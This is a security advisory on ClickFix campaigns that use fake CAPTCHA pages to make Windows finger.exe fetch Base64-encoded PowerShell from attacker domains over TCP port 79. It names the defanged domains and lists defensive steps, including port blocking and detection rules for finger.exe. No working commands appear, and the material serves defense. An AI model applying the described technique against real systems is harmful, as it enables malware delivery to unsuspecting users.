Since November 2025, threat actors behind the ClickFix social engineering campaigns, notably KongTuke and SmartApeSG, have been abusing the finger protocol to deliver malicious payloads. The finger protocol, an old TCP-based service running on port 79, is used here as a covert channel to retrieve commands and scripts from attacker-controlled servers. The attacks involve victims interacting with fake CAPTCHA pages that trigger scripts invoking finger.exe on Windows systems. This utility sends queries to malicious domains such as captchaver[.]top and pmidpils[.]com, which respond with text containing Base64-encoded PowerShell commands or scripts. These commands are then executed on the victim's machine, enabling further compromise. Network traffic analysis using tools like Wireshark reveals finger protocol traffic over TCP port 79, which is uncommon in modern enterprise environments. The campaigns have persisted for over a month, indicating ongoing activity. Corporate environments that enforce explicit proxies or block TCP port 79 traffic effectively disrupt these attacks. However, environments that allow finger.exe outbound connections remain vulnerable. This attack vector leverages a legacy protocol rarely monitored or blocked, allowing attackers to bypass some security controls. The lack of known exploits in the wild beyond these campaigns suggests targeted or limited scope activity, but the technique's persistence and stealth warrant attention. The use of social engineering combined with legacy protocol abuse highlights the need for comprehensive network monitoring and endpoint behavior analysis.

For European organizations, the impact includes potential unauthorized execution of malicious code leading to system compromise, data exfiltration, or lateral movement within networks. Organizations that have legacy systems or allow outbound TCP port 79 traffic are particularly at risk. The use of social engineering via fake CAPTCHA pages increases the likelihood of user interaction, potentially leading to initial infection vectors. If successful, attackers could deploy additional malware or ransomware payloads, disrupt operations, or steal sensitive information. The stealthy nature of using finger.exe and the finger protocol may evade traditional detection mechanisms focused on HTTP/S or common ports, increasing dwell time and complicating incident response. Industries with high regulatory requirements, such as finance, healthcare, and critical infrastructure, could face compliance violations and reputational damage if compromised. However, organizations with strict network egress filtering and proxy enforcement are less likely to be impacted. The medium severity reflects moderate ease of exploitation combined with potentially significant operational impact if defenses are inadequate.

1. Explicitly block outbound TCP port 79 traffic at network perimeter firewalls and proxies to prevent finger protocol communications. 2. Disable or restrict the use of finger.exe on Windows endpoints, especially if not required for business operations. 3. Implement endpoint detection rules to alert on execution of finger.exe or unusual command-line arguments invoking finger queries. 4. Monitor network traffic for TCP port 79 activity and investigate any anomalies or connections to suspicious domains. 5. Educate users about social engineering tactics, particularly fake CAPTCHA pages, to reduce the likelihood of executing malicious scripts. 6. Employ application whitelisting to prevent unauthorized execution of PowerShell scripts or other payloads delivered via this vector. 7. Use DNS filtering to block access to known malicious domains such as captchaver[.]top and pmidpils[.]com. 8. Regularly update and patch endpoint security solutions to detect and block encoded PowerShell payloads. 9. Conduct threat hunting exercises focusing on legacy protocol abuse and unusual outbound connections. 10. Review and tighten proxy and egress filtering policies to cover uncommon protocols like finger.